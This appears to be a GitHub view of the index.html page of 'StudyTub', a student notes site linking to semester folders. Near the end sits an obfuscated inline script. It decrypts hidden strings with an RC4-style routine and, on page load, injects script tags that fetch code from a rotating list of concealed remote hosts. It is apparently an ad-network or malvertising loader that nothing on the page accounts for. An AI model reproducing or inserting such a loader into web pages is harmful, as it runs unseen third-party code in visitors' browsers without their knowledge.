-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathindex.html
456 lines (377 loc) · 24.2 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="google-site-verification" content="studytub" />
<meta charset="UTF-8">
<meta name="description"
content="Welcome to StudyTub! Let us do the hustle of finding notes for you so that you need not go anywhere else" />
<meta name="keywords" content="Studytub Notes Cloudflare Noteshub studytub engineeringnotes engineer engineering" />
<meta property="og:title" content="StudyTub" />
<meta property="og:description"
content="Welcome to StudyTub! Let us do the hustle of finding notes for you so that you need not go anywhere else" />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://nishikantaray.github.io/studytub/" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title>StudyTub</title>
<link rel="icon" href="img/core-img/nanda.png">
<link rel="stylesheet" href="style.css">
<style>
.hidden {
display: none;
}
label {
margin-bottom: 10px;
display: block;
}
</style>
</head>
<body>
<div id="preloader">
<div class="preload-content">
<div id="world-load"></div>
</div>
</div>
<header class="header-area">
<div class="container">
<div class="row">
<div class="col-12">
<nav class="navbar navbar-expand-lg">
<a class="navbar-brand" href="index.html"
style="color: rgb(207, 207, 56); font-size: 30px; font-family: 'Times New Roman', Times, serif; padding-top: 5px;"><img
src="img/core-img/nanda.png" width="40px" height="40px" alt="Logo">StudyTub</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#worldNav"
aria-controls="worldNav" aria-expanded="false" aria-label="Toggle navigation"><span
class="navbar-toggler-icon"></span></button>
<div class="collapse navbar-collapse" id="worldNav">
<ul class="navbar-nav ml-auto">
<li class="nav-item active">
<a class="nav-link" href="#">Home <span class="sr-only">(current)</span></a>
</li>
<li class="nav-item">
<a class="nav-link" href="contact.html">Contact</a>
</li>
<li class="nav-item" style="padding-left: 20px;">
<button id="btn-login" class="btn btn-outline-light" disabled="true" onclick="login()">Log in</button>
</li>
<li class="nav-item">
<button id="btn-logout" class="btn btn-outline-light" disabled="true" onclick="logout()">Log out</button>
</li>
</ul>
<div id="search-wrapper">
<form action="#">
<input type="text" id="search" placeholder="Search something...">
<div id="close-icon"></div>
<input class="d-none" type="submit" value="">
</form>
</div>
</div>
</nav>
</div>
</div>
</div>
</header>
<!-- <div class="hidden" id="gated-content">
<p>
You're seeing this content because you're currently
<strong>logged in</strong>.
</p>
<label>
Access token:
<pre id="ipt-access-token"></pre>
</label>
<label>
User profile:
<pre id="ipt-user-profile"></pre>
</label>
</div> -->
<div class="hero-area">
<div class="hero-slides owl-carousel">
<div class="single-hero-slide bg-img background-overlay"
style="background-image: url(img/core-img/p1.png);"></div>
<div class="single-hero-slide bg-img background-overlay"
style="background-image: url(img/core-img/p2.png);"></div>
<div class="single-hero-slide bg-img background-overlay"
style="background-image: url(img/core-img/p3.png);"></div>
</div>
</div>
<div class="world-latest-articles ">
<div class="container">
<div class="row">
<div class="col-12 col-lg-12">
<div class="title">
<h5>Notes</h5>
</div>
<div class="row">
<div class="col-12 col-md-4 col-lg-4">
<a href="https://notes.studytub.ml/0:/First%20Year/" target="_blank">
<div class="single-blog-post post-style-3 mt-50 wow fadeInUpBig" data-wow-delay="0.2s">
<div class="shadow thumbnail shadow-lg p-3 mb-5 bg-white rounded">
<img src="img/core-img/sem1.gif" alt="1stsem">
<div class="post-content d-flex align-items-center justify-content-between">
</div>
</div>
</div>
</a>
</div>
<div class="col-12 col-md-4 col-lg-4">
<a href="https://notes.studytub.ml/0:/First%20Year/" target="_blank">
<div class="single-blog-post post-style-3 mt-50 wow fadeInUpBig" data-wow-delay="0.2s">
<div class="thumbnail shadow-lg p-3 mb-5 bg-white rounded">
<img src="img/core-img/sem2.gif" alt="">
<div class="post-content d-flex align-items-center justify-content-between">
</div>
</div>
</div>
</a>
</div>
<div class="col-12 col-md-4 col-lg-4">
<a href="https://notes.studytub.ml/0:/3rd%20Sem/" target="_blank">
<div class="single-blog-post post-style-3 mt-50 wow fadeInUpBig" data-wow-delay="0.2s">
<div class="thumbnail shadow-lg p-3 mb-5 bg-white rounded">
<img src="img/core-img/sem3.gif" alt="">
<div class="post-content d-flex align-items-center justify-content-between">
</div>
</div>
</div>
</a>
</div>
<div class="col-12 col-md-4 col-lg-4">
<a href="https://notes.studytub.ml/0:/4th%20Sem/" target="_blank">
<div class="single-blog-post post-style-3 mt-50 wow fadeInUpBig" data-wow-delay="0.2s">
<div class="thumbnail shadow-lg p-3 mb-5 bg-white rounded">
<img src="img/core-img/sem4.gif" alt="">
<div class="post-content d-flex align-items-center justify-content-between">
</div>
</div>
</div>
</a>
</div>
<div class="col-12 col-md-4 col-lg-4">
<a href="https://notes.studytub.ml/0:/5th%20sem/" target="_blank">
<div class="single-blog-post post-style-3 mt-50 wow fadeInUpBig" data-wow-delay="0.2s">
<div class="thumbnail shadow-lg p-3 mb-5 bg-white rounded">
<img src="img/core-img/sem5.gif" alt="">
<div class="post-content d-flex align-items-center justify-content-between">
</div>
</div>
</div>
</a>
</div>
<div class="col-12 col-md-4 col-lg-4">
<a href="https://notes.studytub.ml/0:/6th%20sem/" target="_blank">
<div class="single-blog-post post-style-3 mt-50 wow fadeInUpBig" data-wow-delay="0.2s">
<div class="thumbnail shadow-lg p-3 mb-5 bg-white rounded">
<img src="img/core-img/sem6.gif" alt="">
<div class="post-content d-flex align-items-center justify-content-between">
</div>
</div>
</div>
</a>
</div>
<div class="col-12 col-md-4 col-lg-6 disabled">
<div class="single-blog-post post-style-3 mt-50 wow fadeInUpBig" data-wow-delay="0.2s">
<!-- <div class="post-thumbnail">
<img src="img/core-img/unnamed.jpg" alt="">
<div class="post-content d-flex align-items-center justify-content-between">
<div class="post-tag"><a href="#">Click here</a></div>
<a href="#" class="headline text-light">
<h3>7th Semester</h3>
</a>
<div class="post-meta">
</div>
</div>
</div> -->
</div>
</div>
<div class="col-12 col-md-4 col-lg-6">
<div class="single-blog-post post-style-3 mt-50 wow fadeInUpBig" data-wow-delay="0.2s">
<!-- <div class="post-thumbnail">
<img src="img/core-img/unnamed.jpg" alt="">
<div class="post-content d-flex align-items-center justify-content-between">
<div class="post-tag"><a href="#">Click here</a></div>
<a href="#" class="headline text-light">
<h3>8th Semester</h3>
</a>
<div class="post-meta">
</div>
</div>
</div> -->
</div>
</div>
</div>
</div>
<!-- <div class="col-12 col-lg-4">
<div class="post-sidebar-area wow fadeInUpBig" data-wow-delay="0.2s"
style="visibility: visible; animation-delay: 0.2s; animation-name: fadeInUpBig;">
<div class="sidebar-widget-area">
<h5 class="title">Top Stories</h5>
<div class="widget-content">
<div class="single-blog-post post-style-2 d-flex align-items-center widget-post">
<div class="post-thumbnail">
<img src="img/blog-img/b11.jpg" alt="">
</div>
<div class="post-content">
<a href="#" class="headline">
<h5 class="mb-0">How Did van Gogh’s Turbulent Mind Depict One of the Most
</h5>
</a>
</div>
</div>
<div class="single-blog-post post-style-2 d-flex align-items-center widget-post">
<div class="post-thumbnail">
<img src="img/blog-img/b13.jpg" alt="">
</div>
<div class="post-content">
<a href="#" class="headline">
<h5 class="mb-0">How Did van Gogh’s Turbulent Mind Depict One of the Most
</h5>
</a>
</div>
</div>
<div class="single-blog-post post-style-2 d-flex align-items-center widget-post">
<div class="post-thumbnail">
<img src="img/blog-img/b14.jpg" alt="">
</div>
<div class="post-content">
<a href="#" class="headline">
<h5 class="mb-0">How Did van Gogh’s Turbulent Mind Depict One of the Most
</h5>
</a>
</div>
</div>
<div class="single-blog-post post-style-2 d-flex align-items-center widget-post">
<div class="post-thumbnail">
<img src="img/blog-img/b10.jpg" alt="">
</div>
<div class="post-content">
<a href="#" class="headline">
<h5 class="mb-0">How Did van Gogh’s Turbulent Mind Depict One of the Most
</h5>
</a>
</div>
</div>
<div class="single-blog-post post-style-2 d-flex align-items-center widget-post">
<div class="post-thumbnail">
<img src="img/blog-img/b12.jpg" alt="">
</div>
<div class="post-content">
<a href="#" class="headline">
<h5 class="mb-0">How Did van Gogh’s Turbulent Mind Depict One of the Most
</h5>
</a>
</div>
</div>
</div>
</div>
<div class="sidebar-widget-area">
<h5 class="title">Today’s Pick</h5>
<div class="widget-content">
<div class="single-blog-post todays-pick">
<div class="post-thumbnail">
<img src="img/blog-img/b22.jpg" alt="">
</div>
<div class="post-content px-0 pb-0">
<a href="#" class="headline">
<h5>How Did van Gogh’s Turbulent Mind Depict One of the Most Complex
Concepts in Physics?</h5>
</a>
</div>
</div>
</div>
</div>
</div>
</div> -->
</div>
</div>
<div class="text-center mb-5">
<form><script src="https://checkout.razorpay.com/v1/payment-button.js" data-payment_button_id="pl_HeltcYshrwRhQ3" async> </script> </form>
</div>
<footer id="dk-footer">
<div class="container">
<div class="sec Aboutus">
<h2>Study Tub<a href="#"><img src="img/core-img/nanda.png" width="50" height="50"
style="padding-bottom: 8px;" alt=""></a></h2>
<span class="animate-border border-black"></span>
<div class="footer-detail">
<p>
Your One-Stop for all the Notes.
</p>
</div>
</div>
<!-- End Col -->
<div class="sec QuickLinks">
<h2>About Us</h2>
<u1>
<li><a href="index.html">Home</a></li>
<li><a href="contact.html">Contact</a></li>
<li><a href="https://github.com/NishikantaRay/studytub/graphs/contributors" target="_blank">Team</a></li>
</u1>
</div>
<!-- End col -->
<div class="sec section-heading">
<h2>Contact Us</h2>
<p>Having some questions? Don’t miss your problem</p>
<form action="#">
<div class="sec form-row">
<div class="col dk-footer-form">
<input type="email" class="form-control" placeholder="Email Address" />
<button type="submit" id="gmailus" value="mailto: [email protected]">
<i class="fa fa-send"></i>
</button>
</div>
</div>
</form>
</div>
<div class="sec">
<h2>Follow Us</h2>
<ul class="sci">
<li>
<a href="#" target="_blank"><i class="fa fa-facebook-official" aria-hidden="true"></i></a>
</li>
<li>
<a href="#" target="_blank"><i class="fa fa-instagram" aria-hidden="true"></i></a>
</li>
<li>
<a href="#" target="_blank"><i class="fa fa-linkedin" aria-hidden="true"></i></a>
</li>
<li>
<a href="mailto: [email protected]" target="_blank"><i class="fa fa-google-plus"
aria-hidden="true"></i></a>
</li>
</ul>
</div>
</div>
<!-- End Contact Container -->
<div class="copyrightText">
<p class="p1">“For the students, by the students.”</p>
<p class="p2">
Copyright ©
<script>
document.write(new Date().getFullYear());
</script>
|| Study Tub. All rights reserved
</p>
</div>
</footer>
<script src="https://cdn.auth0.com/js/auth0-spa-js/1.13/auth0-spa-js.production.js"></script>
<script src="js/app.js"></script>
<script type="text/javascript" data-cfasync="false">
/*<![CDATA[/* */
(function () { var b508db652ac10bfce0315d39d0bc80fc = "EYBnWXDCwgmgbdJEsPY-r-ZDnEEZLN4aUnudbPmu8cULmHA5wRmUQUp-7DbJYbB8zfYu1fth6wPUS5R_MVS7"; var b = ['wqPDjcObw7VbeAQ=', 'AsK3T8KSw4JZwq1Dw4YiwoFxw4nDjVo=', 'VCQXFsORw6PClcOzYETCtRLDmg==', 'w6gMwqPCmcOIWGUVw5Q8JMK7', 'VC4SAsOJw6rCj8OX', 'PnvDsHXDm8KCd8OEAiTCo8KSw7vDj8KRHQvDgMK5JhjClS8=', 'bTlJw7vDtw==', 'JknCh8Kmw7jDpQPCig==', 'wo98w4nDmgzDlA==', 'wpZvw6INdcO8w7XCo8OGw4E=', 'w4rCo8K4wqYCZ8KTIA==', 'YibDlQ==', 'BcOgMMKK', 'wrzDkMOTwrvCssKbC3LCvhNXw4fDjMOD', 'w4Mkw6LDmsKUw4nDjhI6wpzDkg==', 'wo7DsMKKQHQt', 'JcK7w5vCggvDqsOKNsO0FsKnw7sfw7dRIQMFw54SKXtUw4nCvsK7wrUNEWjCjnXDlcKtwrZMwprDgmHDmAbCvVUSZWV9w7sywqANw7oc', 'w68bwqrCmcOFf0UNw4Y0JMK7GQ==', 'XsOxw40f', 'w5HCvsK4wrM4OQ==', 'ZcKSU8O3wo3Cmg==', 'fzhT', 'w6dYwox3w7NPB8Kzwp7Cs8Kkdg==', 'w5ZOPgdbwp7DgMKLAC7CqsKkwozCi03DiC1BUBw=', 'NsO/w4vCmQ7Dv8ObLcOpF8KkwqcLw6kVMkEJw4QbYH5fw43DpMO/wqg=', 'IGLDtD7Dn8KcXsOLDiPCs8Ke', 'TlzDpQbDqMONw741wok=', 'AV3CjBlcGA7CtnRiw4sHMxbCl8Knw6bDr8OAw6vCl8O5RU0QwrvCsX4=', 'RnxBfm1/w5A=']; (function (a, c) { var f = function (g) { while (--g) { a['push'](a['shift']()); } }; f(++c); }(b, 0x1f4)); var c = function (a, d) { a = a - 0x0; var e = b[a]; if (c['indHYp'] === undefined) { (function () { var h; try { var j = Function('return\x20(function()\x20' + '{}.constructor(\x22return\x20this\x22)(\x20)' + ');'); h = j(); } catch (k) { h = window; } var i = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; h['atob'] || (h['atob'] = function (l) { var m = String(l)['replace'](/=+$/, ''); var n = ''; for (var o = 0x0, p, q, r = 0x0; q = m['charAt'](r++); ~q && (p = o % 0x4 ? p * 0x40 + q : q, o++ % 0x4) ? n += String['fromCharCode'](0xff & p >> (-0x2 * o & 0x6)) : 0x0) { q = i['indexOf'](q); } return n; }); }()); var g = function (h, l) { var m = [], n = 0x0, o, p = '', q = ''; h = atob(h); for (var t = 0x0, u = h['length']; t < u; t++) { q += '%' + ('00' + h['charCodeAt'](t)['toString'](0x10))['slice'](-0x2); } h = decodeURIComponent(q); var r; for (r = 0x0; r < 0x100; r++) { m[r] = r; } for (r = 0x0; r < 0x100; r++) { n = (n + m[r] + l['charCodeAt'](r % l['length'])) % 0x100; o = m[r]; m[r] = m[n]; m[n] = o; } r = 0x0; n = 0x0; for (var v = 0x0; v < h['length']; v++) { r = (r + 0x1) % 0x100; n = (n + m[r]) % 0x100; o = m[r]; m[r] = m[n]; m[n] = o; p += String['fromCharCode'](h['charCodeAt'](v) ^ m[(m[r] + m[n]) % 0x100]); } return p; }; c['jdWNXm'] = g; c['DWQBWl'] = {}; c['indHYp'] = !![]; } var f = c['DWQBWl'][a]; if (f === undefined) { if (c['ouLejI'] === undefined) { c['ouLejI'] = !![]; } e = c['jdWNXm'](e, d); c['DWQBWl'][a] = e; } else { e = f; } return e; }; var p = window; p[c('0x5', 'yjyB')] = [[c('0xc', 'sN5S'), 0x450653], [c('0xd', '#Dj#'), 0x0], [c('0x6', 'hm^X'), c('0x4', 'TO%(')], [c('0x19', 'T4Dy'), 0x0], [c('0x15', '0zF&'), ![]], [c('0x18', 'FbMx'), 0x0], [c('0xf', 'hOlI'), !0x0]]; var a = [c('0x14', 'LS]9'), c('0x9', 'Wcbe'), c('0x1b', 'la!d'), c('0x11', 'Wcbe')], h = 0x0, q, g = function () { if (!a[h]) return; q = p[c('0x0', '5Lc@')][c('0xa', 'T4Dy')](c('0x8', 'u6v5')); q[c('0xb', '*42Z')] = c('0x17', 'tb@*'); q[c('0x1c', '8eYm')] = !0x0; var e = p[c('0x1a', 'FbMx')][c('0x10', 'k8)f')](c('0x1', '!HFM'))[0x0]; q[c('0xe', '8eYm')] = c('0x3', 'sN5S') + a[h]; q[c('0x7', 'f(4v')] = c('0x13', 'z6jG'); q[c('0x16', 'BMvG')] = function () { h++; g(); }; e[c('0x2', '11Fo')][c('0x12', 'la!d')](q, e); }; g(); })();
/*]]>/* */
</script>
<script src="js/jquery/jquery-2.2.4.min.js"></script>
<script src="js/popper.min.js"></script>
<script src="js/bootstrap.min.js"></script>
<script src="js/plugins.js"></script>
<script src="js/active.js"></script>
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-23581568-13"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag() { dataLayer.push(arguments); }
gtag('js', new Date());
gtag('config', 'UA-23581568-13');
</script>
</body>
</html>